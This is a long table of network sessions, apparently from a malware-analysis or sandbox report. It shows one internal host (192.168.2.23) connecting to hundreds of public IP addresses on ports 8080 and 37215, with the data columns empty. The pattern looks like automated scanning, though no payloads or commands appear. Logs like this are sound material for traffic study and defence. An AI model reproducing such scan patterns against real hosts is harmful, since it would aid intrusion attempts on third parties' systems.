                                                        36934192.168.2.2335284201.228.161.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36935192.168.2.23432624.233.29.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36936192.168.2.233972295.57.246.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36937192.168.2.234893245.111.46.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36938192.168.2.234860247.93.65.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36939192.168.2.2352234136.61.176.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36940192.168.2.233600827.26.234.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36941192.168.2.234786899.221.113.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36942192.168.2.235285235.175.189.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36943192.168.2.2345096152.81.132.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36944192.168.2.2342788124.139.135.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36945192.168.2.234499631.205.170.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36946192.168.2.2358960136.92.105.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36947192.168.2.23376342.128.245.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36948192.168.2.2357382103.52.127.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36949192.168.2.234889836.142.201.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36950192.168.2.2338202189.3.93.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36951192.168.2.235688076.111.39.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36952192.168.2.2355268133.219.209.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36953192.168.2.2354126219.37.228.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36954192.168.2.2345854192.173.3.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36955192.168.2.2353048176.184.6.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36956192.168.2.235602065.55.52.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36957192.168.2.2356042118.88.107.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36958192.168.2.233845867.197.196.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36959192.168.2.2333676145.32.232.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36960192.168.2.2357706194.100.179.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36961192.168.2.2355030156.165.142.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36962192.168.2.235970441.7.142.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36963192.168.2.2344550197.9.128.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36964192.168.2.2352440157.149.216.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36965192.168.2.2338262197.23.238.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36966192.168.2.2352558197.209.180.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36967192.168.2.2340446197.122.158.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36968192.168.2.233486441.164.219.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36969192.168.2.2350878157.159.212.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36970192.168.2.234961890.37.47.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36971192.168.2.2356930118.223.201.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36972192.168.2.2352756106.216.235.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36973192.168.2.2336638201.47.84.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36974192.168.2.234208223.131.122.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36975192.168.2.235656827.65.146.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36976192.168.2.2351456106.170.147.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36977192.168.2.2340820105.238.49.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36978192.168.2.2351702115.251.141.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36979192.168.2.2335196187.72.231.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36980192.168.2.234569648.207.241.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36981192.168.2.235613468.102.239.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36982192.168.2.235967874.192.28.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36983192.168.2.233784284.116.90.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36984192.168.2.233386269.87.67.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36985192.168.2.235615689.92.249.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36986192.168.2.235223874.25.121.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36987192.168.2.2343712216.11.159.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36988192.168.2.2351014189.80.229.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36989192.168.2.2342848190.200.123.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36990192.168.2.2337520122.175.59.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36991192.168.2.233584257.86.247.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36992192.168.2.235612276.247.208.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36993192.168.2.234567045.81.51.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36994192.168.2.23414468.84.27.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36995192.168.2.2354896166.15.28.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36996192.168.2.234001492.114.26.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36997192.168.2.2353368204.236.21.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36998192.168.2.233907071.2.169.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36999192.168.2.23539709.196.68.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37000192.168.2.2341336156.107.104.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37001192.168.2.2360130166.146.120.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37002192.168.2.233930443.15.151.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37003192.168.2.2352736184.68.238.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37004192.168.2.235772052.69.243.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37005192.168.2.23446545.190.158.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37006192.168.2.233545439.210.67.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37007192.168.2.233363667.62.82.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37008192.168.2.2349680206.32.140.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37009192.168.2.2345100107.243.194.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37010192.168.2.2340292161.53.233.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37011192.168.2.233598645.153.87.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37012192.168.2.23472508.163.13.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37013192.168.2.234100271.160.31.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37014192.168.2.235117888.44.178.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37015192.168.2.2347418133.199.188.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37016192.168.2.2333596167.68.45.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37017192.168.2.2346708201.62.68.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37018192.168.2.2353018191.166.143.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37019192.168.2.2353144105.173.191.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37020192.168.2.2352756151.241.47.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37021192.168.2.2359650124.178.90.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37022192.168.2.234699881.21.5.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37023192.168.2.2333636210.55.220.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37024192.168.2.235478695.189.17.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37025192.168.2.234843085.128.118.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37026192.168.2.2333530180.38.220.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37027192.168.2.235755673.133.146.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37028192.168.2.2354220186.98.118.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37029192.168.2.2342836219.14.26.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37030192.168.2.2352420190.25.252.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37031192.168.2.235713848.108.201.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37032192.168.2.2357928133.25.108.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37033192.168.2.2342224157.196.29.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37034192.168.2.2345502195.180.52.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37035192.168.2.2353306144.215.167.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37036192.168.2.235512687.43.228.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37037192.168.2.2336152171.110.104.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37038192.168.2.234110091.200.98.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37039192.168.2.234560876.220.244.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37040192.168.2.2351602203.242.52.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37041192.168.2.233325648.165.7.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37042192.168.2.235471679.204.251.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37043192.168.2.233570857.9.169.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37044192.168.2.2333292164.148.176.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37045192.168.2.2344142136.41.144.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37046192.168.2.235899877.158.238.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37047192.168.2.234730281.197.139.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37048192.168.2.236057819.43.91.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37049192.168.2.2345642175.188.46.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37050192.168.2.2353076220.245.222.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37051192.168.2.234292243.58.7.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37052192.168.2.235339685.137.9.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37053192.168.2.234504653.178.220.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37054192.168.2.2352130139.118.224.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37055192.168.2.2358306143.93.233.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37056192.168.2.235945053.53.144.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37057192.168.2.2342862165.85.7.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37058192.168.2.2358372208.192.27.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37059192.168.2.2333508122.84.140.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37060192.168.2.234048860.228.104.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37061192.168.2.23525789.25.206.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37062192.168.2.2358034153.4.146.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37063192.168.2.236029675.43.201.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37064192.168.2.2346070153.203.50.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37065192.168.2.235260288.107.72.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37066192.168.2.233342064.204.177.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37067192.168.2.235370473.198.142.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37068192.168.2.2344648104.239.185.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37069192.168.2.236023092.240.105.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37070192.168.2.2358436167.242.86.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37071192.168.2.2356704161.234.46.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37072192.168.2.2355024147.75.20.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37073192.168.2.233605491.123.75.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37074192.168.2.234691696.109.163.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37075192.168.2.2343506139.251.106.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37076192.168.2.2358432172.66.150.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37077192.168.2.234205883.96.120.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37078192.168.2.2355590149.1.18.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37079192.168.2.233864086.94.12.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37080192.168.2.235049672.184.81.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37081192.168.2.23401044.78.169.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37082192.168.2.2338410211.139.108.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37083192.168.2.2344610189.25.171.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37084192.168.2.2360110180.98.216.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37085192.168.2.2341470110.120.197.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37086192.168.2.233650890.46.157.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37087192.168.2.2358558166.130.68.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37088192.168.2.2346016204.249.193.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37089192.168.2.234127295.253.45.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37090192.168.2.2345082152.87.83.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37091192.168.2.2338724207.237.85.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37092192.168.2.233876053.179.177.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37093192.168.2.23465161.181.216.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37094192.168.2.2343354162.129.60.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37095192.168.2.2345104170.96.143.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37096192.168.2.2347506163.5.94.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37097192.168.2.2348570174.184.171.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37098192.168.2.2360364148.56.209.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37099192.168.2.2346446162.31.177.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37100192.168.2.2347338172.226.64.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37101192.168.2.2333232187.36.144.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37102192.168.2.2341266117.155.150.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37103192.168.2.233836087.252.165.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37104192.168.2.23549648.90.201.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37105192.168.2.2348500192.95.98.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37106192.168.2.233291452.161.245.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37107192.168.2.2347846157.247.65.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37108192.168.2.234062447.28.9.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37109192.168.2.235902241.21.216.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37110192.168.2.2347724157.207.157.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37111192.168.2.2339532157.5.50.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37112192.168.2.2340872197.188.216.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37113192.168.2.2352292192.255.69.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37114192.168.2.2333828197.228.148.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37115192.168.2.2336552157.63.239.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37116192.168.2.2360272197.118.117.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37117192.168.2.2339976157.117.122.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37118192.168.2.233632241.245.79.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37119192.168.2.2343794157.150.99.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37120192.168.2.233822041.44.104.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37121192.168.2.2341596197.218.244.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37122192.168.2.2344586157.135.29.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37123192.168.2.233400841.145.26.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37124192.168.2.233739441.195.120.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37125192.168.2.234955098.223.151.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37126192.168.2.2356032157.116.95.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37127192.168.2.2340766197.107.141.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37128192.168.2.2342628157.48.64.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37129192.168.2.233937441.93.48.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37130192.168.2.2334836157.209.11.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37131192.168.2.2337904157.112.235.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37132192.168.2.234128441.70.245.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37133192.168.2.2342056157.82.111.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37134192.168.2.2359336197.189.0.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37135192.168.2.233588885.72.215.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37136192.168.2.234643281.226.27.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37137192.168.2.2356164197.114.142.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37138192.168.2.233810441.132.188.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37139192.168.2.234221041.244.235.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37140192.168.2.235593839.81.112.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37141192.168.2.2346186197.170.42.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37142192.168.2.2358334157.203.105.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37143192.168.2.2344852197.250.20.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37144192.168.2.2345036157.11.147.15337215
                                                        TimestampBytes transferredDirectionData


